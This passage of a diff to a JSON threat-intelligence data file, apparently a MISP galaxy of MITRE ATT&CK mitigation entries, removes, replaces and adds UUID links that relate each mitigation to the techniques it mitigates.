+ "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -6229,7 +4723,7 @@
"type": "mitigates"
},
{
- "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c",
+ "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -6261,15 +4755,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "9b99b83a-1aac-4e29-b975-b374950551a3",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "c085476e-1964-4d7f-86e1-d8657a7741e8",
"value": "Accessibility Features Mitigation - T1015"
},
@@ -6293,15 +4779,7 @@
"https://attack.mitre.org/mitigations/T1501"
]
},
- "related": [
- {
- "dest-uuid": "0fff2797-19cb-41ea-a5f1-8a9303b8158e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "83130e62-bca6-4a81-bd4b-8e233bd49db6",
"value": "Systemd Service Mitigation - T1501"
},
@@ -6315,15 +4793,7 @@
"https://www.acunetix.com/websitesecurity/webserver-security/"
]
},
- "related": [
- {
- "dest-uuid": "804c042c-cfe6-449e-bc1a-ba0a998a70db",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "43b366a4-b5ff-4d4e-8a3b-f09a9d2faff5",
"value": "Shared Webroot Mitigation - T1051"
},
@@ -6335,22 +4805,7 @@
"https://attack.mitre.org/mitigations/T1160"
]
},
- "related": [
- {
- "dest-uuid": "8faedf87-dceb-4c35-b2a2-7286f59a3bc3",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "e99ec083-abdd-48de-ad87-4dbf6f8ba2a4",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "402e92cd-5608-4f4b-9a34-a2c962e4bcd7",
"value": "Launch Daemon Mitigation - T1160"
},
@@ -6367,22 +4822,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "34efb2fd-4dc2-40d4-a564-0c147c85034d",
"value": "File Deletion Mitigation - T1107"
},
@@ -6423,20 +4863,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "0ca7beef-9bbc-4e35-97cf-437384ddce6a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "0fff2797-19cb-41ea-a5f1-8a9303b8158e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "106c0cf6-bf73-4601-9aa8-0945c2715ec5",
"tags": [
@@ -6458,13 +4884,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "18d4ab39-12ed-4a16-9fdb-ae311bba4a0f",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "1f9c2bae-b441-4f66-a8af-b65946ee72f2",
"tags": [
@@ -6500,13 +4919,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "2ba5aa71-9d15-4b22-b726-56af06d9ad2f",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "2db31dcd-54da-405d-acef-b9129b816ed6",
"tags": [
@@ -6528,13 +4940,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "3257eb21-f9a7-4430-8de1-d8b6e288f529",
"tags": [
@@ -6563,13 +4968,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "4ab929c6-ee2d-4fb5-aab4-b14be2ed7179",
"tags": [
@@ -6584,13 +4982,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "514ede4c-78b3-4d78-a38b-daddf6217a79",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "51a14c76-dd3b-440b-9c20-2bf91d25a814",
"tags": [
@@ -6598,13 +4989,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b",
"tags": [
@@ -6612,13 +4996,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "53bfc8bf-8f76-4cd7-8958-49a884ddb3ee",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "544b0346-29ad-41e1-a808-501bb4193f47",
"tags": [
@@ -6675,13 +5052,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "62dfd1ca-52d5-483c-a84b-d6e80bf94b7b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "677569f9-a8b0-459e-ab24-7f18091fa7bf",
"tags": [
@@ -6696,13 +5066,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "6a5848a8-6201-4a2c-8a6a-ca5af8c6f3df",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "6b57dc31-b814-4a03-8706-28bc20d739c4",
"tags": [
@@ -6760,7 +5123,7 @@
"type": "mitigates"
},
{
- "dest-uuid": "804c042c-cfe6-449e-bc1a-ba0a998a70db",
+ "dest-uuid": "7c46b364-8496-4234-8a56-f7e6727e21e1",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -6822,13 +5185,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "8faedf87-dceb-4c35-b2a2-7286f59a3bc3",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "910906dd-8c0a-475a-9cc1-5e029e2fad58",
"tags": [
@@ -6850,13 +5206,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "9e8b28c9-35fe-48ac-a14d-e6cc032dcbcd",
"tags": [
@@ -6879,14 +5228,14 @@
"type": "mitigates"
},
{
- "dest-uuid": "a1b52199-c8c5-438a-9ded-656f1d0888c6",
+ "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "mitigates"
},
{
- "dest-uuid": "a257ed11-ff3b-4216-8c9d-3938ef57064c",
+ "dest-uuid": "a1b52199-c8c5-438a-9ded-656f1d0888c6",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -6906,13 +5255,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "aa8bfbc9-78dc-41a4-a03b-7453e0fdccda",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579",
"tags": [
@@ -6948,27 +5290,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "c0a384a4-9a25-40e1-97b6-458388474bc8",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "c23b740b-a42b-47a1-aec2-9d48ddd547ff",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "c4ad009b-6e13-4419-8d21-918a1652de02",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7",
"tags": [
@@ -7032,13 +5353,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "dd901512-6e37-4155-943b-453e3777b125",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "dfefe2ed-4389-4318-8762-f0272b350a1b",
"tags": [
@@ -7081,20 +5395,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "e906ae4d-1d3a-4675-be23-22f7311c0da4",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "e99ec083-abdd-48de-ad87-4dbf6f8ba2a4",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "eb062747-2193-45de-8fa2-e62549c37ddf",
"tags": [
@@ -7137,6 +5437,13 @@
],
"type": "mitigates"
},
+ {
+ "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ },
{
"dest-uuid": "f8ef3a62-3f44-40a4-abca-761ab235c436",
"tags": [
@@ -7169,15 +5476,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "6aabc5ec-eae6-422c-8311-38d45ee9838a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "f9b3e5d9-7454-4b7d-bce6-27620e19924e",
"value": "Redundant Access Mitigation - T1108"
},
@@ -7189,22 +5488,7 @@
"https://attack.mitre.org/mitigations/T1109"
]
},
- "related": [
- {
- "dest-uuid": "10d5f3b7-6be6-4da5-9a77-0f1e2bbfcc44",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "791481f8-e96a-41be-b089-a088763083d4",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "676975b9-7e8e-463d-a31e-4ed2ecbfed81",
"value": "Component Firmware Mitigation - T1109"
},
@@ -7217,22 +5501,7 @@
"https://attack.mitre.org/mitigations/T1019"
]
},
- "related": [
- {
- "dest-uuid": "16ab6452-c3c1-497c-a47d-206018ca1ada",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "6856ddd6-2df3-4379-8b87-284603c189c3",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "25e53928-6f33-49b7-baee-8180578286f6",
"value": "System Firmware Mitigation - T1019"
},
@@ -7290,15 +5559,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "2a8de25c-f743-4348-b101-3ee33ab5871b",
"value": "Data Encrypted Mitigation - T1022"
},
@@ -7316,15 +5577,7 @@
"https://www.stigviewer.com/stig/windows_server_2008_r2_member_server/2015-06-25/finding/V-26482"
]
},
- "related": [
- {
- "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "a13e35cc-8c90-4d77-a965-5461042c1612",
"value": "Shortcut Modification Mitigation - T1023"
},
@@ -7336,15 +5589,7 @@
"https://attack.mitre.org/mitigations/T1204"
]
},
- "related": [
- {
- "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "548bf7ad-e19c-4d74-84bf-84ac4e57f505",
"value": "User Execution Mitigation - T1204"
},
@@ -7392,13 +5637,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "39a130e1-6ab7-434a-8bd2-418e7d9d6427",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529",
"tags": [
@@ -7449,7 +5687,7 @@
"type": "mitigates"
},
{
- "dest-uuid": "72b5ef57-325c-411b-93ca-a3ca6fa17e31",
+ "dest-uuid": "90c4a591-d02d-490b-92aa-619d9701ac04",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -7484,14 +5722,14 @@
"type": "mitigates"
},
{
- "dest-uuid": "dce31a00-1e90-4655-b0f9-e2e71a748a87",
+ "dest-uuid": "eb125d40-0b2d-41ac-a71a-3229241c2cd3",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "mitigates"
},
{
- "dest-uuid": "eb125d40-0b2d-41ac-a71a-3229241c2cd3",
+ "dest-uuid": "f4c1826f-a322-41cd-9557-562100848c84",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -7517,13 +5755,6 @@
]
},
"related": [
- {
- "dest-uuid": "0ca7beef-9bbc-4e35-97cf-437384ddce6a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073",
"tags": [
@@ -7552,13 +5783,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "7c93aa74-4bc0-4a9e-90ea-f25f86301566",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "9e8b28c9-35fe-48ac-a14d-e6cc032dcbcd",
"tags": [
@@ -7573,27 +5797,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "c1b11bf7-c68e-4fbf-a95b-28efbe7953bb",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "c23b740b-a42b-47a1-aec2-9d48ddd547ff",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "e624264c-033a-424d-9fd7-fc9c3bbdb03e",
"tags": [
@@ -7628,13 +5831,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "52d40641-c480-4ad5-81a3-c80ccaddf82d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90",
"tags": [
@@ -7642,13 +5838,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "6c174520-beea-43d9-aac6-28fb77f3e446",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "b8cfed42-6a8a-4989-ad72-541af74475ec",
"tags": [
@@ -7689,15 +5878,7 @@
"https://attack.mitre.org/mitigations/T1205"
]
},
- "related": [
- {
- "dest-uuid": "451a9977-d255-43c9-b431-66de80130c8c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "f6b7c116-0821-4eb7-9b24-62bd09b3e575",
"value": "Port Knocking Mitigation - T1205"
},
@@ -7724,13 +5905,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "02fefddc-fb1b-423f-a76b-7552dd211d4d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "06c00069-771a-4d57-8ef5-d3718c1a8771",
"tags": [
@@ -7752,13 +5926,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "0fff2797-19cb-41ea-a5f1-8a9303b8158e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "1126cab1-c700-412f-a510-61f4937bb096",
"tags": [
@@ -7815,13 +5982,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "2169ba87-1146-4fc7-a118-12b72251db7e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "24769ab5-14bd-4f4e-a752-cfb185da53ee",
"tags": [
@@ -7850,13 +6010,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "2edd9d6a-5674-4326-a600-ba56de467286",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "2f6b4ed7-fef1-44ba-bcb8-1b4beb610b64",
"tags": [
@@ -7871,13 +6024,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "327f3cc5-eea1-42d4-a6cd-ed34b7ce8f61",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "341e222a-a6e3-4f6f-b69c-831d792b1580",
"tags": [
@@ -7991,14 +6137,14 @@
"type": "mitigates"
},
{
- "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484",
+ "dest-uuid": "54ca26f3-c172-4231-93e5-ccebcac2161f",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "mitigates"
},
{
- "dest-uuid": "54ca26f3-c172-4231-93e5-ccebcac2161f",
+ "dest-uuid": "55bb4471-ff1f-43b4-88c1-c9384ec47abf",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -8060,13 +6206,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "6856ddd6-2df3-4379-8b87-284603c189c3",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "68a0c5ed-bee2-4513-830d-5b0d650139bd",
"tags": [
@@ -8088,13 +6227,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "6be14413-578e-46c1-8304-310762b3ecd5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830",
"tags": [
@@ -8116,13 +6248,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "772bc7a8-a157-42cc-8728-d648e25c7fe7",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "7b211ac6-c815-4189-93a9-ab415deca926",
"tags": [
@@ -8151,13 +6276,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "804c042c-cfe6-449e-bc1a-ba0a998a70db",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "818302b2-d640-477b-bf88-873120ce85c4",
"tags": [
@@ -8172,6 +6290,13 @@
],
"type": "mitigates"
},
+ {
+ "dest-uuid": "8861073d-d1b8-4941-82ce-dce621d398f0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ },
{
"dest-uuid": "8a2f40cf-8325-47f9-96e4-b1ca4c7389bd",
"tags": [
@@ -8221,13 +6346,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "9e80ddfb-ce32-4961-a778-ca6a10cfae72",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "a009cb25-4801-4116-9105-80a91cf15c1b",
"tags": [
@@ -8249,13 +6367,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "a257ed11-ff3b-4216-8c9d-3938ef57064c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "a542bac9-7bc1-4da7-9a09-96f69e23cc21",
"tags": [
@@ -8284,13 +6395,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "b39d03cb-7b98-41c4-a878-c40c1a913dc0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "b46a801b-fd98-491c-a25a-bca25d6e3001",
"tags": [
@@ -8305,34 +6409,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "c16e5409-ee53-4d79-afdc-4099dc9292df",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "c1b11bf7-c68e-4fbf-a95b-28efbe7953bb",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "c23b740b-a42b-47a1-aec2-9d48ddd547ff",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "c3bce4f4-9795-46c6-976e-8676300bbc39",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f",
"tags": [
@@ -8340,13 +6416,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4",
"tags": [
@@ -8396,6 +6465,13 @@
],
"type": "mitigates"
},
+ {
+ "dest-uuid": "d94b3ae9-8059-4989-8e9f-ea0f601f80a7",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ },
{
"dest-uuid": "dcaa092b-7de9-4a21-977f-7fcb77e89c48",
"tags": [
@@ -8438,13 +6514,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "e906ae4d-1d3a-4675-be23-22f7311c0da4",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "ea016b56-ae0e-47fe-967a-cc0ad51af67f",
"tags": [
@@ -8508,20 +6577,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "f44731de-ea9f-406d-9b83-30ecbb9b4392",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "f4c1826f-a322-41cd-9557-562100848c84",
"tags": [
@@ -8570,13 +6625,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "mitigates"
- },
- {
- "dest-uuid": "ffe742ed-9100-4686-9e00-c331da544787",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
}
],
"uuid": "9bb9e696-bff8-4ae1-9454-961fc7d91d5f",
@@ -8591,15 +6639,7 @@
"https://attack.mitre.org/mitigations/T1026"
]
},
- "related": [
- {
- "dest-uuid": "99709758-2b96-48f2-a68a-ad7fbd828091",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "da987565-27b6-4b31-bbcd-74b909847116",
"value": "Multiband Communication Mitigation - T1026"
},
@@ -8611,15 +6651,7 @@
"https://attack.mitre.org/mitigations/T1206"
]
},
- "related": [
- {
- "dest-uuid": "2169ba87-1146-4fc7-a118-12b72251db7e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "dbf0186e-722d-4a0a-af6a-b3460f162f84",
"value": "Sudo Caching Mitigation - T1206"
},
@@ -8639,13 +6671,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "086952c4-5b90-4185-b573-02bad8e11953",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22",
"tags": [
@@ -8681,13 +6706,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "2169ba87-1146-4fc7-a118-12b72251db7e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "21875073-b0ee-49e3-9077-1e2a885359af",
"tags": [
@@ -8744,20 +6762,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "44dca04b-808d-46ca-b25f-d85236d4b9f8",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "51ea26b1-ff1e-4faa-b1a0-1114cd298c87",
"tags": [
@@ -8857,7 +6861,7 @@
"type": "mitigates"
},
{
- "dest-uuid": "9b99b83a-1aac-4e29-b975-b374950551a3",
+ "dest-uuid": "90c4a591-d02d-490b-92aa-619d9701ac04",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -8877,20 +6881,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "b8c5c9dd-a662-479d-9428-ae745872537c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "c0df6533-30ee-4a4a-9c6d-17af5abdf0b2",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "c615231b-f253-4f58-9d47-d5b4cbdb6839",
"tags": [
@@ -8905,20 +6895,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "ce73ea43-8e77-47ba-9c11-5e9c9c58b9ff",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "d519cfd5-f3a8-43a9-a846-ed0bb40672b1",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "e0033c16-a07e-48aa-8204-7c3ca669998c",
"tags": [
@@ -8974,13 +6950,6 @@
]
},
"related": [
- {
- "dest-uuid": "0bf78622-e8d2-41da-a857-731472d61a92",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "1cfcb312-b8d7-47a4-b560-4b16cc677292",
"tags": [
@@ -9074,15 +7043,7 @@
"https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-tools-and-settings"
]
},
- "related": [
- {
- "dest-uuid": "dce31a00-1e90-4655-b0f9-e2e71a748a87",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "a1482e43-f3ff-4fbd-94de-ad1244738166",
"value": "Time Providers Mitigation - T1209"
},
@@ -9095,15 +7056,7 @@
"https://attack.mitre.org/mitigations/T1029"
]
},
- "related": [
- {
- "dest-uuid": "4eeaf8a9-c86b-4954-a663-9555fb406466",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "1c0711c8-2a73-48a1-893d-ff88bcd23824",
"value": "Scheduled Transfer Mitigation - T1029"
},
@@ -9123,13 +7076,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "0fff2797-19cb-41ea-a5f1-8a9303b8158e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "106c0cf6-bf73-4601-9aa8-0945c2715ec5",
"tags": [
@@ -9199,13 +7145,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "6e6845c2-347a-4a6f-a2d1-b74a18ebd352",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "ae7f3575-0a5e-427e-991b-fe03ad44c754",
"tags": [
@@ -9301,15 +7240,7 @@
"https://skanthak.homepage.t-online.de/sentinel.html"
]
},
- "related": [
- {
